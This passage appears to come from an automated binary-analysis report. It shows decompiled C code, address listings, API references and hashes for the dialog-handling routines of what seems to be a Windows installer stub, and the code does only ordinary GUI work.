                        				intOrPtr _v84;
                        				void* _v88;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t198;
                        				intOrPtr _t201;
                        				long _t207;
                        				signed int _t211;
                        				signed int _t222;
                        				void* _t225;
                        				void* _t226;
                        				int _t232;
                        				long _t237;
                        				long _t238;
                        				signed int _t239;
                        				signed int _t245;
                        				signed int _t247;
                        				signed char _t248;
                        				signed char _t254;
                        				void* _t258;
                        				void* _t260;
                        				signed char* _t278;
                        				signed char _t279;
                        				long _t284;
                        				struct HWND__* _t291;
                        				signed int* _t292;
                        				int _t293;
                        				long _t294;
                        				signed int _t295;
                        				void* _t297;
                        				long _t298;
                        				int _t299;
                        				signed int _t300;
                        				signed int _t303;
                        				signed int _t311;
                        				signed char* _t319;
                        				int _t324;
                        				void* _t326;
                        
                        				_t291 = _a4;
                        				_v12 = GetDlgItem(_t291, 0x3f9);
                        				_v8 = GetDlgItem(_t291, 0x408);
                        				_t326 = SendMessageW;
                        				_v24 =  *0x434f28;
                        				_v28 =  *0x434f10 + 0x94;
                        				if(_a8 != 0x110) {
                        					L23:
                        					if(_a8 != 0x405) {
                        						_t301 = _a16;
                        					} else {
                        						_a12 = 0;
                        						_t301 = 1;
                        						_a8 = 0x40f;
                        						_a16 = 1;
                        					}
                        					if(_a8 == 0x4e || _a8 == 0x413) {
                        						_v16 = _t301;
                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                        							if(( *0x434f19 & 0x00000002) != 0) {
                        								L41:
                        								if(_v16 != 0) {
                        									_t237 = _v16;
                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                        									}
                        									_t238 = _v16;
                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                        										_t301 = _v24;
                        										_t239 =  *(_t238 + 0x5c);
                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                        										} else {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                        										}
                        									}
                        								}
                        								goto L48;
                        							}
                        							if(_a8 == 0x413) {
                        								L33:
                        								_t301 = 0 | _a8 != 0x00000413;
                        								_t245 = E00404E54(_v8, _a8 != 0x413);
                        								_t295 = _t245;
                        								if(_t295 >= 0) {
                        									_t94 = _v24 + 8; // 0x8
                        									_t301 = _t245 * 0x818 + _t94;
                        									_t247 =  *_t301;
                        									if((_t247 & 0x00000010) == 0) {
                        										if((_t247 & 0x00000040) == 0) {
                        											_t248 = _t247 ^ 0x00000001;
                        										} else {
                        											_t254 = _t247 ^ 0x00000080;
                        											if(_t254 >= 0) {
                        												_t248 = _t254 & 0x000000fe;
                        											} else {
                        												_t248 = _t254 | 0x00000001;
                        											}
                        										}
                        										 *_t301 = _t248;
                        										E0040117D(_t295);
                        										_a12 = _t295 + 1;
                        										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                        										_a8 = 0x40f;
                        									}
                        								}
                        								goto L41;
                        							}
                        							_t301 = _a16;
                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                        								goto L41;
                        							}
                        							goto L33;
                        						} else {
                        							goto L48;
                        						}
                        					} else {
                        						L48:
                        						if(_a8 != 0x111) {
                        							L56:
                        							if(_a8 == 0x200) {
                        								SendMessageW(_v8, 0x200, 0, 0);
                        							}
                        							if(_a8 == 0x40b) {
                        								_t225 =  *0x42d24c;
                        								if(_t225 != 0) {
                        									ImageList_Destroy(_t225);
                        								}
                        								_t226 =  *0x42d260;
                        								if(_t226 != 0) {
                        									GlobalFree(_t226);
                        								}
                        								 *0x42d24c = 0;
                        								 *0x42d260 = 0;
                        								 *0x434f60 = 0;
                        							}
                        							if(_a8 != 0x40f) {
                        								L90:
                        								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                        									ShowWindow(_v8, _t324);
                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                        								}
                        								goto L93;
                        							} else {
                        								E004011EF(_t301, 0, 0);
                        								_t198 = _a12;
                        								if(_t198 != 0) {
                        									if(_t198 != 0xffffffff) {
                        										_t198 = _t198 - 1;
                        									}
                        									_push(_t198);
                        									_push(8);
                        									E00404ED4();
                        								}
                        								if(_a16 == 0) {
                        									L75:
                        									E004011EF(_t301, 0, 0);
                        									_v36 =  *0x42d260;
                        									_t201 =  *0x434f28;
                        									_v64 = 0xf030;
                        									_v24 = 0;
                        									if( *0x434f2c <= 0) {
                        										L86:
                        										if( *0x434fbe == 0x400) {
                        											InvalidateRect(_v8, 0, 1);
                        										}
                        										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                        											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                        										}
                        										goto L90;
                        									}
                        									_t292 = _t201 + 8;
                        									do {
                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                        										if(_t207 != 0) {
                        											_t303 =  *_t292;
                        											_v72 = _t207;
                        											_v76 = 8;
                        											if((_t303 & 0x00000001) != 0) {
                        												_v76 = 9;
                        												_v60 =  &(_t292[4]);
                        												_t292[0] = _t292[0] & 0x000000fe;
                        											}
                        											if((_t303 & 0x00000040) == 0) {
                        												_t211 = (_t303 & 0x00000001) + 1;
                        												if((_t303 & 0x00000010) != 0) {
                        													_t211 = _t211 + 3;
                        												}
                        											} else {
                        												_t211 = 3;
                        											}
                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                        										}
                        										_v24 = _v24 + 1;
                        										_t292 =  &(_t292[0x206]);
                        									} while (_v24 <  *0x434f2c);
                        									goto L86;
                        								} else {
                        									_t293 = E004012E2( *0x42d260);
                        									E00401299(_t293);
                        									_t222 = 0;
                        									_t301 = 0;
                        									if(_t293 <= 0) {
                        										L74:
                        										SendMessageW(_v12, 0x14e, _t301, 0);
                        										_a16 = _t293;
                        										_a8 = 0x420;
                        										goto L75;
                        									} else {
                        										goto L71;
                        									}
                        									do {
                        										L71:
                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                        											_t301 = _t301 + 1;
                        										}
                        										_t222 = _t222 + 1;
                        									} while (_t222 < _t293);
                        									goto L74;
                        								}
                        							}
                        						}
                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                        							goto L93;
                        						} else {
                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                        							if(_t232 == 0xffffffff) {
                        								goto L93;
                        							}
                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                        								_t294 = 0x20;
                        							}
                        							E00401299(_t294);
                        							SendMessageW(_a4, 0x420, 0, _t294);
                        							_a12 = _a12 | 0xffffffff;
                        							_a16 = 0;
                        							_a8 = 0x40f;
                        							goto L56;
                        						}
                        					}
                        				} else {
                        					_v36 = 0;
                        					_v20 = 2;
                        					 *0x434f60 = _t291;
                        					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                        					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                        					 *0x42d254 =  *0x42d254 | 0xffffffff;
                        					_t297 = _t258;
                        					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                        					 *0x42d24c = _t260;
                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                        					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                        					}
                        					DeleteObject(_t297);
                        					_t298 = 0;
                        					do {
                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                        							if(_t298 != 0x20) {
                        								_v20 = 0;
                        							}
                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                        						}
                        						_t298 = _t298 + 1;
                        					} while (_t298 < 0x21);
                        					_t299 = _a16;
                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                        					_push(0x15);
                        					E00404499(_a4);
                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                        					_push(0x16);
                        					E00404499(_a4);
                        					_t300 = 0;
                        					_v16 = 0;
                        					if( *0x434f2c <= 0) {
                        						L19:
                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                        						goto L20;
                        					} else {
                        						_t319 = _v24 + 8;
                        						_v32 = _t319;
                        						do {
                        							_t278 =  &(_t319[0x10]);
                        							if( *_t278 != 0) {
                        								_v64 = _t278;
                        								_t279 =  *_t319;
                        								_v88 = _v16;
                        								_t311 = 0x20;
                        								_v84 = 0xffff0002;
                        								_v80 = 0xd;
                        								_v68 = _t311;
                        								_v44 = _t300;
                        								_v72 = _t279 & _t311;
                        								if((_t279 & 0x00000002) == 0) {
                        									if((_t279 & 0x00000004) == 0) {
                        										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									} else {
                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                        									}
                        								} else {
                        									_v80 = 0x4d;
                        									_v48 = 1;
                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									_v36 = 1;
                        									 *( *0x42d260 + _t300 * 4) = _t284;
                        									_v16 =  *( *0x42d260 + _t300 * 4);
                        								}
                        							}
                        							_t300 = _t300 + 1;
                        							_t319 =  &(_v32[0x818]);
                        							_v32 = _t319;
                        						} while (_t300 <  *0x434f2c);
                        						if(_v36 != 0) {
                        							L20:
                        							if(_v20 != 0) {
                        								E004044CE(_v8);
                        								goto L23;
                        							} else {
                        								ShowWindow(_v12, 5);
                        								E004044CE(_v12);
                        								L93:
                        								return E00404500(_a8, _a12, _a16);
                        							}
                        						}
                        						goto L19;
                        					}
                        				}
                        			}


























































                        0x00404f0d
                        0x00404f26
                        0x00404f2b
                        0x00404f33
                        0x00404f39
                        0x00404f4f
                        0x00404f52
                        0x0040517d
                        0x00405184
                        0x00405198
                        0x00405186
                        0x00405188
                        0x0040518b
                        0x0040518c
                        0x00405193
                        0x00405193
                        0x004051a4
                        0x004051b2
                        0x004051b5
                        0x004051cb
                        0x00405240
                        0x00405243
                        0x00405245
                        0x0040524f
                        0x0040525d
                        0x0040525d
                        0x0040525f
                        0x00405269
                        0x0040526f
                        0x00405272
                        0x00405275
                        0x00405290
                        0x00405277
                        0x00405281
                        0x00405281
                        0x00405275
                        0x00405269
                        0x00000000
                        0x00405243
                        0x004051d0
                        0x004051db
                        0x004051e0
                        0x004051e7
                        0x004051ec
                        0x004051f0
                        0x004051fb
                        0x004051fb
                        0x004051ff
                        0x00405203
                        0x00405207
                        0x0040521a
                        0x00405209
                        0x00405209
                        0x00405210
                        0x00405216
                        0x00405212
                        0x00405212
                        0x00405212
                        0x00405210
                        0x0040521e
                        0x00405220
                        0x00405233
                        0x00405236
                        0x00405239
                        0x00405239
                        0x00405203
                        0x00000000
                        0x004051f0
                        0x004051d2
                        0x004051d9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405293
                        0x00405293
                        0x0040529a
                        0x0040530b
                        0x00405313
                        0x0040531b
                        0x0040531b
                        0x00405324
                        0x00405326
                        0x0040532d
                        0x00405330
                        0x00405330
                        0x00405336
                        0x0040533d
                        0x00405340
                        0x00405340
                        0x00405346
                        0x0040534c
                        0x00405352
                        0x00405352
                        0x0040535f
                        0x004054c0
                        0x004054c7
                        0x004054e4
                        0x004054ea
                        0x004054fc
                        0x004054fc
                        0x00000000
                        0x00405365
                        0x00405367
                        0x0040536c
                        0x00405371
                        0x00405376
                        0x00405378
                        0x00405378
                        0x00405379
                        0x0040537a
                        0x0040537c
                        0x0040537c
                        0x00405384
                        0x004053c5
                        0x004053c7
                        0x004053d7
                        0x004053da
                        0x004053df
                        0x004053e6
                        0x004053e9
                        0x0040548b
                        0x00405494
                        0x0040549c
                        0x0040549c
                        0x004054aa
                        0x004054bb
                        0x004054bb
                        0x00000000
                        0x004054aa
                        0x004053ef
                        0x004053f2
                        0x004053f8
                        0x004053fd
                        0x004053ff
                        0x00405401
                        0x00405407
                        0x0040540e
                        0x00405413
                        0x0040541a
                        0x0040541d
                        0x0040541d
                        0x00405424
                        0x00405430
                        0x00405434
                        0x00405436
                        0x00405436
                        0x00405426
                        0x00405428
                        0x00405428
                        0x00405456
                        0x00405462
                        0x00405471
                        0x00405471
                        0x00405473
                        0x00405476
                        0x0040547f
                        0x00000000
                        0x00405386
                        0x00405391
                        0x00405394
                        0x00405399
                        0x0040539b
                        0x0040539f
                        0x004053af
                        0x004053b9
                        0x004053bb
                        0x004053be
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004053a1
                        0x004053a1
                        0x004053a7
                        0x004053a9
                        0x004053a9
                        0x004053aa
                        0x004053ab
                        0x00000000
                        0x004053a1
                        0x00405384
                        0x0040535f
                        0x004052a2
                        0x00000000
                        0x004052b8
                        0x004052c2
                        0x004052c7
                        0x00000000
                        0x00000000
                        0x004052d9
                        0x004052de
                        0x004052ea
                        0x004052ea
                        0x004052ec
                        0x004052fb
                        0x004052fd
                        0x00405301
                        0x00405304
                        0x00000000
                        0x00405304
                        0x004052a2
                        0x00404f58
                        0x00404f5d
                        0x00404f66
                        0x00404f6d
                        0x00404f7f
                        0x00404f8a
                        0x00404f90
                        0x00404f9e
                        0x00404fb2
                        0x00404fb7
                        0x00404fc4
                        0x00404fc9
                        0x00404fdf
                        0x00404ff0
                        0x00404ffd
                        0x00404ffd
                        0x00405000
                        0x00405006
                        0x00405008
                        0x0040500b
                        0x00405010
                        0x00405015
                        0x00405017
                        0x00405017
                        0x00405037
                        0x00405037
                        0x00405039
                        0x0040503a
                        0x0040503f
                        0x00405045
                        0x00405049
                        0x0040504e
                        0x00405056
                        0x0040505a
                        0x0040505f
                        0x00405064
                        0x0040506c
                        0x0040506f
                        0x0040513f
                        0x00405152
                        0x00000000
                        0x00405075
                        0x00405078
                        0x0040507b
                        0x0040507e
                        0x0040507e
                        0x00405084
                        0x0040508d
                        0x00405090
                        0x00405094
                        0x00405097
                        0x0040509a
                        0x004050a3
                        0x004050ac
                        0x004050af
                        0x004050b2
                        0x004050b5
                        0x004050f3
                        0x0040511e
                        0x004050f5
                        0x00405104
                        0x00405104
                        0x004050b7
                        0x004050ba
                        0x004050c8
                        0x004050d2
                        0x004050da
                        0x004050e1
                        0x004050ec
                        0x004050ec
                        0x004050b5
                        0x00405124
                        0x00405125
                        0x00405131
                        0x00405131
                        0x0040513d
                        0x00405158
                        0x0040515b
                        0x00405178
                        0x00000000
                        0x0040515d
                        0x00405162
                        0x0040516b
                        0x004054fe
                        0x00405510
                        0x00405510
                        0x0040515b
                        0x00000000
                        0x0040513d
                        0x0040506f

                        APIs
                        • GetDlgItem.USER32 ref: 00404F1E
                        • GetDlgItem.USER32 ref: 00404F29
                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                        • LoadImageW.USER32 ref: 00404F8A
                        • SetWindowLongW.USER32 ref: 00404FA3
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                        • DeleteObject.GDI32(00000000), ref: 00405000
                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                          • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                        • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                        • SetWindowLongW.USER32 ref: 00405152
                        • ShowWindow.USER32(?,00000005), ref: 00405162
                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                        • ImageList_Destroy.COMCTL32(?), ref: 00405330
                        • GlobalFree.KERNEL32 ref: 00405340
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                        • ShowWindow.USER32(?,00000000), ref: 004054EA
                        • GetDlgItem.USER32 ref: 004054F5
                        • ShowWindow.USER32(00000000), ref: 004054FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 2564846305-813528018
                        • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                        • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                        • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                        • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                        				struct HWND__* _v28;
                        				void* _v84;
                        				void* _v88;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t34;
                        				signed int _t36;
                        				signed int _t38;
                        				struct HWND__* _t48;
                        				signed int _t67;
                        				struct HWND__* _t73;
                        				signed int _t86;
                        				struct HWND__* _t91;
                        				signed int _t99;
                        				int _t103;
                        				signed int _t117;
                        				int _t118;
                        				int _t122;
                        				signed int _t124;
                        				struct HWND__* _t127;
                        				struct HWND__* _t128;
                        				int _t129;
                        				intOrPtr _t130;
                        				long _t133;
                        				int _t135;
                        				int _t136;
                        				void* _t137;
                        
                        				_t130 = _a8;
                        				if(_t130 == 0x110 || _t130 == 0x408) {
                        					_t34 = _a12;
                        					_t127 = _a4;
                        					__eflags = _t130 - 0x110;
                        					 *0x42d250 = _t34;
                        					if(_t130 == 0x110) {
                        						 *0x434f08 = _t127;
                        						 *0x42d264 = GetDlgItem(_t127, 1);
                        						_t91 = GetDlgItem(_t127, 2);
                        						_push(0xffffffff);
                        						_push(0x1c);
                        						 *0x42b230 = _t91;
                        						E00404499(_t127);
                        						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                        						 *0x433ecc = E0040140B(4);
                        						_t34 = 1;
                        						__eflags = 1;
                        						 *0x42d250 = 1;
                        					}
                        					_t124 =  *0x40a368; // 0xffffffff
                        					_t136 = 0;
                        					_t133 = (_t124 << 6) +  *0x434f20;
                        					__eflags = _t124;
                        					if(_t124 < 0) {
                        						L36:
                        						E004044E5(0x40b);
                        						while(1) {
                        							_t36 =  *0x42d250;
                        							 *0x40a368 =  *0x40a368 + _t36;
                        							_t133 = _t133 + (_t36 << 6);
                        							_t38 =  *0x40a368; // 0xffffffff
                        							__eflags = _t38 -  *0x434f24;
                        							if(_t38 ==  *0x434f24) {
                        								E0040140B(1);
                        							}
                        							__eflags =  *0x433ecc - _t136;
                        							if( *0x433ecc != _t136) {
                        								break;
                        							}
                        							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
                        							if(__eflags >= 0) {
                        								break;
                        							}
                        							_t117 =  *(_t133 + 0x14);
                        							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                        							_push(0xfffffc19);
                        							E00404499(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                        							_push(0xfffffc1b);
                        							E00404499(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                        							_push(0xfffffc1a);
                        							E00404499(_t127);
                        							_t48 = GetDlgItem(_t127, 3);
                        							__eflags =  *0x434f8c - _t136;
                        							_v28 = _t48;
                        							if( *0x434f8c != _t136) {
                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                        								__eflags = _t117;
                        							}
                        							ShowWindow(_t48, _t117 & 0x00000008);
                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                        							E004044BB(_t117 & 0x00000002);
                        							_t118 = _t117 & 0x00000004;
                        							EnableWindow( *0x42b230, _t118);
                        							__eflags = _t118 - _t136;
                        							if(_t118 == _t136) {
                        								_push(1);
                        							} else {
                        								_push(_t136);
                        							}
                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                        							__eflags =  *0x434f8c - _t136;
                        							if( *0x434f8c == _t136) {
                        								_push( *0x42d264);
                        							} else {
                        								SendMessageW(_t127, 0x401, 2, _t136);
                        								_push( *0x42b230);
                        							}
                        							E004044CE();
                        							E0040653D(0x42d268, E00403F7B());
                        							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                        							SetWindowTextW(_t127, 0x42d268);
                        							_push(_t136);
                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                        							__eflags = _t67;
                        							if(_t67 != 0) {
                        								continue;
                        							} else {
                        								__eflags =  *_t133 - _t136;
                        								if( *_t133 == _t136) {
                        									continue;
                        								}
                        								__eflags =  *(_t133 + 4) - 5;
                        								if( *(_t133 + 4) != 5) {
                        									DestroyWindow( *0x433ed8);
                        									 *0x42c240 = _t133;
                        									__eflags =  *_t133 - _t136;
                        									if( *_t133 <= _t136) {
                        										goto L60;
                        									}
                        									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133);
                        									__eflags = _t73 - _t136;
                        									 *0x433ed8 = _t73;
                        									if(_t73 == _t136) {
                        										goto L60;
                        									}
                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                        									_push(6);
                        									E00404499(_t73);
                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                        									ScreenToClient(_t127, _t137 + 0x10);
                        									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                        									_push(_t136);
                        									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                        									__eflags =  *0x433ecc - _t136;
                        									if( *0x433ecc != _t136) {
                        										goto L63;
                        									}
                        									ShowWindow( *0x433ed8, 8);
                        									E004044E5(0x405);
                        									goto L60;
                        								}
                        								__eflags =  *0x434f8c - _t136;
                        								if( *0x434f8c != _t136) {
                        									goto L63;
                        								}
                        								__eflags =  *0x434f80 - _t136;
                        								if( *0x434f80 != _t136) {
                        									continue;
                        								}
                        								goto L63;
                        							}
                        						}
                        						DestroyWindow( *0x433ed8);
                        						 *0x434f08 = _t136;
                        						EndDialog(_t127,  *0x42ba38);
                        						goto L60;
                        					} else {
                        						__eflags = _t34 - 1;
                        						if(_t34 != 1) {
                        							L35:
                        							__eflags =  *_t133 - _t136;
                        							if( *_t133 == _t136) {
                        								goto L63;
                        							}
                        							goto L36;
                        						}
                        						_push(0);
                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                        						__eflags = _t86;
                        						if(_t86 == 0) {
                        							goto L35;
                        						}
                        						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                        						__eflags =  *0x433ecc;
                        						return 0 |  *0x433ecc == 0x00000000;
                        					}
                        				} else {
                        					_t127 = _a4;
                        					_t136 = 0;
                        					if(_t130 == 0x47) {
                        						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                        					}
                        					_t122 = _a12;
                        					if(_t130 != 5) {
                        						L8:
                        						if(_t130 != 0x40d) {
                        							__eflags = _t130 - 0x11;
                        							if(_t130 != 0x11) {
                        								__eflags = _t130 - 0x111;
                        								if(_t130 != 0x111) {
                        									goto L28;
                        								}
                        								_t135 = _t122 & 0x0000ffff;
                        								_t128 = GetDlgItem(_t127, _t135);
                        								__eflags = _t128 - _t136;
                        								if(_t128 == _t136) {
                        									L15:
                        									__eflags = _t135 - 1;
                        									if(_t135 != 1) {
                        										__eflags = _t135 - 3;
                        										if(_t135 != 3) {
                        											_t129 = 2;
                        											__eflags = _t135 - _t129;
                        											if(_t135 != _t129) {
                        												L27:
                        												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                        												goto L28;
                        											}
                        											__eflags =  *0x434f8c - _t136;
                        											if( *0x434f8c == _t136) {
                        												_t99 = E0040140B(3);
                        												__eflags = _t99;
                        												if(_t99 != 0) {
                        													goto L28;
                        												}
                        												 *0x42ba38 = 1;
                        												L23:
                        												_push(0x78);
                        												L24:
                        												E00404472();
                        												goto L28;
                        											}
                        											E0040140B(_t129);
                        											 *0x42ba38 = _t129;
                        											goto L23;
                        										}
                        										__eflags =  *0x40a368 - _t136; // 0xffffffff
                        										if(__eflags <= 0) {
                        											goto L27;
                        										}
                        										_push(0xffffffff);
                        										goto L24;
                        									}
                        									_push(_t135);
                        									goto L24;
                        								}
                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                        								_t103 = IsWindowEnabled(_t128);
                        								__eflags = _t103;
                        								if(_t103 == 0) {
                        									L63:
                        									return 0;
                        								}
                        								goto L15;
                        							}
                        							SetWindowLongW(_t127, _t136, _t136);
                        							return 1;
                        						}
                        						DestroyWindow( *0x433ed8);
                        						 *0x433ed8 = _t122;
                        						L60:
                        						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                        							ShowWindow(_t127, 0xa);
                        							 *0x42f268 = 1;
                        						}
                        						goto L63;
                        					} else {
                        						asm("sbb eax, eax");
                        						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                        						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                        							L28:
                        							return E00404500(_a8, _t122, _a16);
                        						} else {
                        							ShowWindow(_t127, 4);
                        							goto L8;
                        						}
                        					}
                        				}
                        			}































                        0x00403fa5
                        0x00403fac
                        0x00404113
                        0x00404117
                        0x0040411b
                        0x0040411d
                        0x00404122
                        0x0040412d
                        0x00404138
                        0x0040413d
                        0x0040413f
                        0x00404141
                        0x00404144
                        0x00404149
                        0x00404157
                        0x00404164
                        0x0040416b
                        0x0040416b
                        0x0040416c
                        0x0040416c
                        0x00404171
                        0x00404177
                        0x0040417e
                        0x00404184
                        0x00404186
                        0x004041c6
                        0x004041cb
                        0x004041d0
                        0x004041d0
                        0x004041d5
                        0x004041de
                        0x004041e0
                        0x004041e5
                        0x004041eb
                        0x004041ef
                        0x004041ef
                        0x004041f4
                        0x004041fa
                        0x00000000
                        0x00000000
                        0x00404205
                        0x0040420b
                        0x00000000
                        0x00000000
                        0x00404214
                        0x0040421c
                        0x00404221
                        0x00404224
                        0x0040422a
                        0x0040422f
                        0x00404232
                        0x00404238
                        0x0040423d
                        0x00404240
                        0x00404246
                        0x0040424e
                        0x00404254
                        0x0040425a
                        0x0040425e
                        0x00404265
                        0x00404265
                        0x00404265
                        0x0040426f
                        0x00404281
                        0x0040428d
                        0x00404292
                        0x0040429c
                        0x004042a2
                        0x004042a4
